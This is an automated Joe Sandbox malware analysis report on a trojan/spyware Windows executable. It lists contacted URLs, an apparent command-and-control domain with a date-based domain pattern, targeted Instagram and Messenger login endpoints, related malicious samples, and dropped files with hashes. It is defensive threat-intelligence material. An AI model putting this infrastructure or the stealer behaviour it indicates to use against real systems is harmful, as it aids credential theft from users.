http://pki.goog/gsr2/GTSGIAG3.crt0)	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/fb1.6	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0#	0%	Avira URL Cloud	safe
https://static.nc-img.com/uiraa/libs/vendors_70ac76496c2b0e5ed06c	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/stepxztN8b6xDUh	0%	Avira URL Cloud	safe
https://aefd.nelreports.net/api/report?cat=bingth	0%	Avira URL Cloud	safe
http://exchangework%04d%02d%02d.xyz/accept:	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/stepbidden	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/ddpbidden	0%	Avira URL Cloud	safe
http://crl.pki.goog/GTSGIAG3.crl0	0%	Avira URL Cloud	safe
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://1a469593c1fe15dc.xyz/info/dd	0%	Avira URL Cloud	safe
http://1a469593c1fe15dc.xyz/info/fbX	0%	Avira URL Cloud	safe
https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ	0%	Avira URL Cloud	safe
http://pki.goog/gsr2/GTS1O1.crt0M	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0M	0%	URL Reputation	safe
http://pki.goog/gsr2/GTS1O1.crt0M	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	0%	URL Reputation	safe
https://static.nc-img.com/uiraa/app.ab29bfd164428d10f	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
1a469593c1fe15dc.xyz	198.54.117.244	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://1a469593c1fe15dc.xyz/info/fb	false	Avira URL Cloud: safe	unknown
http://1a469593c1fe15dc.xyz/info/step	false	Avira URL Cloud: safe	unknown
http://1a469593c1fe15dc.xyz/info/dd	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplate	ecv71A3.tmp.1.dr	false		high
https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd	aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://service.real.com/realplay	aOn5CfTiwS.exe, 00000000.00000003.226749595.00000000022AA000.00000004.00000001.sdmp	false		high
https://www.messenger.comaccept-language:	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://www.msn.com	ecv71A3.tmp.1.dr	false		high
http://1a469593c1fe15dc.xyz/info/ddpxztN8b6xDUh	aOn5CfTiwS.exe, 00000000.00000003.245417883.00000000022AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net	1612058829275.exe, 00000001.00000002.224509570.0000000000198000.00000004.00000010.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-700-webfont.b125dc012841fa8a23b98c37499ca5e8	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.instagram.com	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0f	ecv71A3.tmp.1.dr	false		high
http://charlesproxy.com/ssl	6C0CE2DD0584C47CAC18839F14055F19FA270CDD.0.dr	false		high
http://www.interoperabilitybridges.com/wmp-extension-for-chrome	aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://ocsp.pki.goog/gts1o1core0	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://maps.windows.com/windows-app-web-link	ecv71A3.tmp.1.dr	false		high
http://www.msn.com/?ocid=iehp	ecv71A3.tmp.1.dr	false		high
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166	ecv71A3.tmp.1.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCee0d4d5fd4424c8390d703b105f82c3	ecv71A3.tmp.1.dr	false		high
https://srtb.msn.com/auction?a=de-ch&b=a8415ac9f9644a1396bc1648a4599445&c=MSN&d=http%3A%2F%2Fwww.msn	ecv71A3.tmp.1.dr	false		high
http://crl.pki.goog/GTS1O1core.crl0	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://1a469593c1fe15dc.xyz/info/stepstatus=0&L	aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://www.nirsoft.net/	aOn5CfTiwS.exe, 00000000.00000003.226629593.00000000022E7000.00000004.00000001.sdmp, 1612058829275.exe, 1612058829275.exe.0.dr	false		high
http://ocsp.pki.goog/GTSGIAG30	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-300-webfont.96dd56ebb50aa0150f6630360d8d69cf	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/login/nonce/wd=488x1043;	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
https://logincdn.msauth.net/16.000/Converged_v21033_-0mnSwu67knBd7qR7YN9GQ2.css	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://logincdn.msauth.net/16.000.28666.10/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc1937	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://logincdn.msauth.net/16.000.28666.10/content/images/ellipsis_white_5ac590ee72bfe06a7cecfd75b5	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://www.instagram.com/	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	download_engine.dll.0.dr	false		high
http://www.xunlei.com/GET	download_engine.dll.0.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC5bdddb231cf54f958a5b6e76e9d8eee	ecv71A3.tmp.1.dr	false		high
http://1a469593c1fe15dc.xyz/info/stepmsn.com%2FB	aOn5CfTiwS.exe, 00000000.00000003.229179321.00000000022A4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://static.nc	aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://static.nc-img.com/uiraa/app.3c1b6a5a2612ad098ccd.js	aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/origin:	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://pki.goog/gsr2/GTS1O1.crt0	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	ecv71A3.tmp.1.dr	false		high
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml	ecv71A3.tmp.1.dr	false		high
https://support.google.	aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.216545630.00000000022B1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/	ecv71A3.tmp.1.dr	false		high
http://ocsp.pki.goog/gsr202	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://pki.goog/repository/0	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://cvision.media.net/new/300x300/3/167/174/27/39ab3103-8560-4a55-bfc4-401f897cf6f2.jpg?v=9	ecv71A3.tmp.1.dr	false		high
http://www.msn.com/	ecv71A3.tmp.1.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RC828bc1cde9f04b788c98b5423157734	ecv71A3.tmp.1.dr	false		high
https://static.nc-img.com/uiraa/libs/polyfills_469970f8ffedace1b5b8	aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=1463674	ecv71A3.tmp.1.dr	false		high
https://static.nc-img.com/pp/nc-ui-globalenv/museo-sans-500-webfont.5d9883d92e2eaa724e4e6beb0ef6728a	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE	aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp	false		high
http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/consent/55a804	ecv71A3.tmp.1.dr	false		high
https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3	ecv71A3.tmp.1.dr	false		high
https://static.nc-img.com/pp/nc-ui-globalenv/mainLegacy.bb0357e72b1f882521990fd54c3c08d1.css	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/48/nrrV18753.js	ecv71A3.tmp.1.dr	false		high
https://www.instagram.comreferer:	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pki.goog/gsr2/gsr2.crl0?	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://static.nc-img.com/uiraa/app.ab29bfd164428d10f32bc34df1cad4ed.css	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pki.goog/gsr2/GTSGIAG3.crt0)	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://1a469593c1fe15dc.xyz/info/fb1.6	aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.xunlei.com/	download_engine.dll.0.dr	false		high
http://pki.goog/gsr2/GTS1O1.crt0#	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://static.nc-img.com/uiraa/libs/vendors_70ac76496c2b0e5ed06c	aOn5CfTiwS.exe, aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp, aOn5CfTiwS.exe, 00000000.00000003.245404335.00000000022B2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://1a469593c1fe15dc.xyz/info/stepxztN8b6xDUh	aOn5CfTiwS.exe, 00000000.00000003.230318427.00000000022AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingth	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	download_engine.dll.0.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	ecv71A3.tmp.1.dr	false		high
https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.js	ecv71A3.tmp.1.dr	false		high
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbf	ecv71A3.tmp.1.dr	false		high
https://curl.haxx.se/docs/http-cookies.html	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://www.openssl.org/support/faq.html	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp, download_engine.dll.0.dr	false		high
https://www.namecheap.com/assets/img/nc	aOn5CfTiwS.exe, 00000000.00000003.259723561.0000000002301000.00000004.00000001.sdmp	false		high
https://www.instagram.com/accounts/login/ajax/facebook/	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e	ecv71A3.tmp.1.dr	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	xldl.dll.0.dr	false		high
http://exchangework%04d%02d%02d.xyz/accept:	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	low
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	ecv71A3.tmp.1.dr	false		high
http://1a469593c1fe15dc.xyz/info/stepbidden	aOn5CfTiwS.exe, 00000000.00000003.230318427.00000000022AE000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl	aOn5CfTiwS.exe, 00000000.00000003.216601589.00000000022A8000.00000004.00000001.sdmp	false		high
http://1a469593c1fe15dc.xyz/info/ddpbidden	aOn5CfTiwS.exe, 00000000.00000003.245417883.00000000022AD000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.messenger.com/login/nonce/	aOn5CfTiwS.exe, 00000000.00000002.265153330.00000000101DE000.00000002.00000001.sdmp	false		high
http://www.synametrics.com	aOn5CfTiwS.exe	false		high
https://charlesproxy.com/ssl1	6C0CE2DD0584C47CAC18839F14055F19FA270CDD.0.dr	false		high
http://www.apache.org/licenses/LICENSE-2.0	aOn5CfTiwS.exe, 00000000.00000003.259758311.00000000034C1000.00000004.00000001.sdmp	false		high
http://crl.pki.goog/GTSGIAG3.crl0	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://ocsp.thawte.com0	xldl.dll.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://store.paycenter.uc.cnmail-attachment.googleusercontent.com	MiniThunderPlatform.exe.0.dr	false		high
http://1a469593c1fe15dc.xyz/info/fbX	aOn5CfTiwS.exe, 00000000.00000003.227931874.00000000022A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJ	ecv71A3.tmp.1.dr	false	Avira URL Cloud: safe	unknown
http://pki.goog/gsr2/GTS1O1.crt0M	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc71c68d7b8f049b6a6f3b669bd5d00c	ecv71A3.tmp.1.dr	false		high
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au	ecv71A3.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.msn.com/de-ch/?ocid=iehp	ecv71A3.tmp.1.dr	false		high
https://static.nc-img.com/uiraa/app.ab29bfd164428d10f	aOn5CfTiwS.exe	false	Avira URL Cloud: safe	unknown
http://service.real.com/realplayer/security/02062012_player/en/	aOn5CfTiwS.exe, 00000000.00000003.216455905.00000000022B1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.54.117.244	unknown	United States		22612	NAMECHEAP-NETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	346349
Start date:	30.01.2021
Start time:	18:06:14
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	aOn5CfTiwS (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.spyw.evad.winEXE@10/16@7/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 95.8%) Quality average: 83% Quality standard deviation: 26.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 104.43.193.48, 23.210.248.85, 51.11.168.160, 92.122.213.194, 92.122.213.247, 67.26.83.254, 67.26.81.254, 67.27.159.126, 8.248.119.254, 8.241.9.254, 20.54.26.129, 51.104.146.109, 52.155.217.156 Excluded domains from analysis (whitelisted): displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.54.117.244	INGNhYonmgtGZ9Updf.exe	Get hash	malicious	Browse	www.profille-sarina23tammara.club/ur06/?nt=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIm/nR1OhQf&2d=9rm4l4y
	JdtN8nIcLi8RQOi.exe	Get hash	malicious	Browse	www.profille-sarina23tammara.club/ur06/?w0G=ndiTFPcHXxkLG&jL30vv=/QZku4jr0440TRq1cGoqU4zGfqmcs15TzcELdSgrk2PZPfOWImoRhmS5wBIMgXh1KjYf
	ordine.exe	Get hash	malicious	Browse	www.solidconstruct.site/jqc/?I6A=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEv/IosbvDuD9rCIw==&YL0=8pN4lD
	PT300975-inv.exe	Get hash	malicious	Browse	www.solidconstruct.site/jqc/?JfEtEZgp=AQxPeURRQ9kC4DgOk8VME5njQ8dFSmWtzYEqQ7tz67PuOtzOYn8gv4wq3HEWg5IvV5fpD9rFbA==&ojq0s=RzulsD
	test.js	Get hash	malicious	Browse	101legit.com/0.html
	dsexplrob.exe	Get hash	malicious	Browse	i3mode.com/dbExpressversion/db87987Administrator.php?b=FKfEZOAdYedIVNeAlGKbCgFzoODmhh
	nbmvwchp.js	Get hash	malicious	Browse	101legit.com/0.html

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	PO_55004.exe	Get hash	malicious	Browse	68.65.122.156
	SecuriteInfo.com.Trojan.MulDrop16.10041.23448.exe	Get hash	malicious	Browse	185.61.153.111
	SecuriteInfo.com.Trojan.Inject4.6821.6799.exe	Get hash	malicious	Browse	199.188.200.150
	DCAjXz5y4I.exe	Get hash	malicious	Browse	162.213.255.196
	NEW ORDER.xlsm	Get hash	malicious	Browse	104.219.248.89
	Claim_250196008_01282021.xls	Get hash	malicious	Browse	162.0.226.110
	Claim_250196008_01282021.xls	Get hash	malicious	Browse	162.0.226.110
	lbqFKoALqe.exe	Get hash	malicious	Browse	198.54.117.215
	j64eIR1IEK.exe	Get hash	malicious	Browse	198.54.117.210
	document.doc	Get hash	malicious	Browse	199.193.7.228
	CMA CGM Shipping Documents COAU7014424560.xlsx	Get hash	malicious	Browse	198.54.117.215
	order.exe	Get hash	malicious	Browse	199.193.7.228
	SecuriteInfo.com.Heur.11979.xls	Get hash	malicious	Browse	162.0.226.110
	SecuriteInfo.com.Heur.11979.xls	Get hash	malicious	Browse	162.0.226.110
	#Ud83d#Udce9.htm	Get hash	malicious	Browse	198.54.115.249
	Pending Orders Statement -40064778.doc	Get hash	malicious	Browse	198.54.122.60
	documenting.doc	Get hash	malicious	Browse	198.54.122.60
	#B30COPY.htm	Get hash	malicious	Browse	198.54.115.249
	AE-808_RAJEN.exe	Get hash	malicious	Browse	68.65.122.156
	RFQ Tengco_270121.doc	Get hash	malicious	Browse	198.54.122.60

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	fnhcdXEfus.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	fnhcdXEfus.exe	Get hash	malicious	Browse
	fnhcdXEfus.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	Cyfj6XGbkd.exe	Get hash	malicious	Browse
	N1yprTBBXs.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse
	FileSetup-v17.04.41.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	268744
Entropy (8bit):	5.398284390686728
Encrypted:	false
SSDEEP:	6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5:	E2E9483568DC53F68BE0B80C34FE27FB
SHA1:	8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256:	205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512:	B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0.h.Q.;.Q.;.Q.;.Y.;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;.].;.Q.;Sr.;.Q.;.Y.;.Q.;*Y.;.Q.;.Q.;.P.;...;.Q.;'F.;.Q.;EZ.;.Q.;'F.;.Q.;Rich.Q.;........................PE..L...^..S..........................................@..........................`......"Q...............................................P..x............................................................................................................textbss1U...............................text...>....p...................... ..`.rdata...i.......p... ..............@..@.data...L...........................@....idata...J.......P..................@....rsrc...x....P......................@..@........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73160
Entropy (8bit):	6.49500452335621
Encrypted:	false
SSDEEP:	1536:BG9vRpkFqhyU/v47PZSOKhqTwYu5tEm1n22W:E1RIOAkz5tEmZvW
MD5:	F0372FF8A6148498B19E04203DBB9E69
SHA1:	27FE4B5F8CB9464AB5DDC63E69C3C180B77DBDE8
SHA-256:	298D334B630C77B70E66CF5E9C1924C7F0D498B02C2397E92E2D9EFDFF2E1BDF
SHA-512:	65D84817CDDDB808B6E0AB964A4B41E96F7CE129E3CC8C253A31642EFE73A9B7070638C22C659033E1479322ACEEA49D1AFDCEFF54F8ED044B1513BFFD33F865
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D."C..L...L...L.......L.....&.L.......L.....Y.L.'~!...L.'~7...L...M.\.L.......L.......L.......L.Rich..L.........PE..L......P.....................X.......$............@..........................@......>.....@.....................................P............................ ..d...`...............................P...@............... ............................text...\|........................... ..`.rdata...&.......(..................@..@.data...............................@....rsrc...............................@..@.reloc..H.... ......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\atl71.dll Download File
Process:	C:\Users\user\Desktop\aOn5CfTiwS.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	89600
Entropy (8bit):	6.46929682960805
Encrypted:	false
SSDEEP:	1536:kIlL9T5Xx1ogKMvw5Br7KLKLI+Xe+QnyH4Cc0tR6nGVp/VTbkE0DJ4ZwmroV:BtvBOI+FQny5R6nG//SdaZwms
MD5:	79CB6457C81ADA9EB7F2087CE799AAA7
SHA1:	322DDDE439D9254182F5945BE8D97E9D897561AE
SHA-256:	A68E1297FAE2BCF854B47FFA444F490353028DE1FA2CA713B6CF6CC5AA22B88A
SHA-512:	ECA4B91109D105B2CE8C40710B8E3309C4CC944194843B7930E06DAF3D1DF6AE85C1B7063036C7E5CD10276E5E5535B33E49930ADBAD88166228316283D011B8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	low
